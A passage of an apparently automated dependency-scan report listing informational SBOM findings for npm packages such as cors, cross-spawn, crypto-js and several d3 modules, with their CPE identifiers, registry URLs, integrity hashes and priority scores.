cpe:2.3:a:cors:cors:2.8.6:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/cors@2.8.6 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/cors/-/cors-2.8.6.tgz integrity: sha512-tJtZBBHA6vjIAaF6EnIaq6laBBP9aq/Y3ouVJjEfoHbRBcHBAHYcMh/w8LDrk2PvIMMq8gmopa5D4V8RmbrxGw== dependencies: object-assign: ^4 vary: ^1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 24841e3ab0fadbb6 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml startLine: 0 message: 'Package discovered: coverallsapp/github-action master' title: coverallsapp/github-action master description: 'Package discovered: coverallsapp/github-action master' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: cbf693155383c51f name: coverallsapp/github-action version: master type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml accessPath: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:coverallsapp\/github-action:coverallsapp\/github-action:master:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:coverallsapp\/github-action:coverallsapp\/github_action:master:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:coverallsapp\/github_action:coverallsapp\/github-action:master:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:coverallsapp\/github_action:coverallsapp\/github_action:master:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:coverallsapp\/github:coverallsapp\/github-action:master:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:coverallsapp\/github:coverallsapp\/github_action:master:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/coverallsapp/github-action@master metadataType: github-actions-use-statement metadata: value: coverallsapp/github-action@master compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c42474dc158d56dd ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: cross-fetch 3.2.0' title: cross-fetch 3.2.0 description: 'Package discovered: cross-fetch 3.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1ef521ded724ae55 name: cross-fetch version: 3.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:cross-fetch_project:cross-fetch:3.2.0:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/cross-fetch@3.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/cross-fetch/-/cross-fetch-3.2.0.tgz integrity: sha512-Q+xVJLoGOeIMXZmbUK4HYk+69cQH6LudR0Vu/pRm2YlU/hDV9CiS0gKUMaWY5f2NeUH9C1nV3bsTlCo0FsTV1Q== dependencies: node-fetch: ^2.7.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ab79d32b8583840a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: cross-spawn 7.0.6' title: cross-spawn 7.0.6 description: 'Package discovered: cross-spawn 7.0.6' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 043761526fd95886 name: cross-spawn version: 7.0.6 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:cross-spawn:cross-spawn:7.0.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cross-spawn:cross_spawn:7.0.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cross_spawn:cross-spawn:7.0.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cross_spawn:cross_spawn:7.0.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cross:cross-spawn:7.0.6:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:cross:cross_spawn:7.0.6:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/cross-spawn@7.0.6 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz integrity: sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA== dependencies: path-key: ^3.1.0 shebang-command: ^2.0.0 which: ^2.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8714b6edd2c6df07 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: crypto-js 4.2.0' title: crypto-js 4.2.0 description: 'Package discovered: crypto-js 4.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2eb6177b3fd9fb78 name: crypto-js version: 4.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:crypto-js:crypto-js:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:crypto-js:crypto_js:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:crypto_js:crypto-js:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:crypto_js:crypto_js:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:crypto:crypto-js:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:crypto:crypto_js:4.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/crypto-js@4.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/crypto-js/-/crypto-js-4.2.0.tgz integrity: sha512-KALDyEYgpY+Rlob/iriUtjV6d5Eq+Y191A5g4UqLAi8CyGP9N1+FdVbkc1SxKc2r4YAYqG8JzO2KGL+AizD70Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5c9f6165bd9afd4d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: cssesc 3.0.0' title: cssesc 3.0.0 description: 'Package discovered: cssesc 3.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7ab312baa29fde7a name: cssesc version: 3.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:cssesc:cssesc:3.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/cssesc@3.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/cssesc/-/cssesc-3.0.0.tgz integrity: sha512-/Tb/JcjK111nNScGob5MNtsntNM1aCNUDipB/TkwZFhyDrrE47SOx/18wF2bbjgc3ZzCSKW1T5nt5EbFoAz/Vg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e510323d242254fb ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: csstype 3.2.3' title: csstype 3.2.3 description: 'Package discovered: csstype 3.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7a5abc30c1904007 name: csstype version: 3.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:csstype:csstype:3.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/csstype@3.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/csstype/-/csstype-3.2.3.tgz integrity: sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: bd9d3c33974e198d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: d3-array 3.2.4' title: d3-array 3.2.4 description: 'Package discovered: d3-array 3.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d16a22647e62d254 name: d3-array version: 3.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:d3-array:d3-array:3.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3-array:d3_array:3.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_array:d3-array:3.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_array:d3_array:3.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3-array:3.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3_array:3.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/d3-array@3.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/d3-array/-/d3-array-3.2.4.tgz integrity: sha512-tdQAmyA18i4J7wprpYq8ClcxZy3SC31QMeByyCFyRt7BVHdREQZ5lpzoe5mFEYZUWe+oq8HBvk9JjpibyEV4Jg== dependencies: internmap: 1 - 2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fe81bed2b7c1ca62 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: d3-color 3.1.0' title: d3-color 3.1.0 description: 'Package discovered: d3-color 3.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 633ef642a5395c1a name: d3-color version: 3.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:d3-color:d3-color:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3-color:d3_color:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_color:d3-color:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_color:d3_color:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3-color:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3_color:3.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/d3-color@3.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/d3-color/-/d3-color-3.1.0.tgz integrity: sha512-zg/chbXyeBtMQ1LbD/WSoW2DpC3I0mpmPdW+ynRTj/x2DAWYrIY7qeZIHidozwV24m4iavr15lNwIwLxRmOxhA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d9ebb131f790b372 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: d3-ease 3.0.1' title: d3-ease 3.0.1 description: 'Package discovered: d3-ease 3.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 5c5a953bcb066b0e name: d3-ease version: 3.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:d3-ease:d3-ease:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3-ease:d3_ease:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_ease:d3-ease:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_ease:d3_ease:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3-ease:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3_ease:3.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/d3-ease@3.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/d3-ease/-/d3-ease-3.0.1.tgz integrity: sha512-wR/XK3D3XcLIZwpbvQwQ5fK+8Ykds1ip7A2Txe0yxncXSdq1L9skcG7blcedkOX+ZcgxGAmLX1FrRGbADwzi0w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fe1c10f297b89c50 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: d3-format 3.1.2' title: d3-format 3.1.2 description: 'Package discovered: d3-format 3.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 5199669646af57ab name: d3-format version: 3.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:d3-format:d3-format:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3-format:d3_format:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_format:d3-format:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_format:d3_format:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3-format:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3_format:3.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/d3-format@3.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/d3-format/-/d3-format-3.1.2.tgz integrity: sha512-AJDdYOdnyRDV5b6ArilzCPPwc1ejkHcoyFarqlPqT7zRYjhavcT3uSrqcMvsgh2CgoPbK3RCwyHaVyxYcP2Arg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d580ebf8b65eecc5 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: d3-interpolate 3.0.1' title: d3-interpolate 3.0.1 description: 'Package discovered: d3-interpolate 3.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2bcd6b2445ac379d name: d3-interpolate version: 3.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:d3-interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3-interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3-interpolate:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3_interpolate:3.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/d3-interpolate@3.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/d3-interpolate/-/d3-interpolate-3.0.1.tgz integrity: sha512-3bYs1rOD33uo8aqJfKP3JWPAibgw8Zm2+L9vBKEHJ2Rg+viTR7o5Mmv5mZcieN+FRYaAOWX5SJATX6k1PWz72g== dependencies: d3-color: 1 - 3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9d53314d3544b04e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: d3-path 3.1.0' title: d3-path 3.1.0 description: 'Package discovered: d3-path 3.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 63d3c4d24d9be1d5 name: d3-path version: 3.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:d3-path:d3-path:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3-path:d3_path:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_path:d3-path:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_path:d3_path:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3-path:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3_path:3.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/d3-path@3.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/d3-path/-/d3-path-3.1.0.tgz integrity: sha512-p3KP5HCf/bvjBSSKuXid6Zqijx7wIfNW+J/maPs+iwR35at5JCbLUT0LzF1cnjbCHWhqzQTIN2Jpe8pRebIEFQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 964951e667c4c379 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: d3-scale 4.0.2' title: d3-scale 4.0.2 description: 'Package discovered: d3-scale 4.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6f08c8eb1953f0ad name: d3-scale version: 4.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:d3-scale:d3-scale:4.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3-scale:d3_scale:4.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_scale:d3-scale:4.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_scale:d3_scale:4.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3-scale:4.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3_scale:4.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/d3-scale@4.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/d3-scale/-/d3-scale-4.0.2.tgz integrity: sha512-GZW464g1SH7ag3Y7hXjf8RoUuAFIqklOAq3MRl4OaWabTFJY9PN/E1YklhXLh+OQ3fM9yS2nOkCoS+WLZ6kvxQ== dependencies: d3-array: 2.10.0 - 3 d3-format: 1 - 3 d3-interpolate: 1.2.0 - 3 d3-time: 2.1.1 - 3 d3-time-format: 2 - 4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fdbd8e26e660bbf2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: d3-shape 3.2.0' title: d3-shape 3.2.0 description: 'Package discovered: d3-shape 3.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 62919ef646dbae92 name: d3-shape version: 3.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:d3-shape:d3-shape:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3-shape:d3_shape:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_shape:d3-shape:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_shape:d3_shape:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3-shape:3.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3_shape:3.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/d3-shape@3.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/d3-shape/-/d3-shape-3.2.0.tgz integrity: sha512-SaLBuwGm3MOViRq2ABk3eLoxwZELpH6zhl3FbAoJ7Vm1gofKx6El1Ib5z23NUEhF9AsGl7y+dzLe5Cw2AArGTA== dependencies: d3-path: ^3.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 53764226f7fa140f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: d3-time 3.1.0' title: d3-time 3.1.0 description: 'Package discovered: d3-time 3.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 809edf0f6cbf0d31 name: d3-time version: 3.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:d3-time:d3-time:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3-time:d3_time:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_time:d3-time:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_time:d3_time:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3-time:3.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3:d3_time:3.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/d3-time@3.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/d3-time/-/d3-time-3.1.0.tgz integrity: sha512-VqKjzBLejbSMT4IgbmVgDjpkYrNWUYJnbCGo874u7MMKIWsILRX+OpX/gTk8MqjpT1A/c6HY2dCA77ZN0lkQ2Q== dependencies: d3-array: 2 - 3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e86c38bd447bf3a0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: d3-time-format 4.1.0' title: d3-time-format 4.1.0 description: 'Package discovered: d3-time-format 4.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4c75f293b12c6086 name: d3-time-format version: 4.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:d3-time-format:d3-time-format:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3-time-format:d3_time_format:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_time_format:d3-time-format:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3_time_format:d3_time_format:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:d3-time:d3-time-format:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: 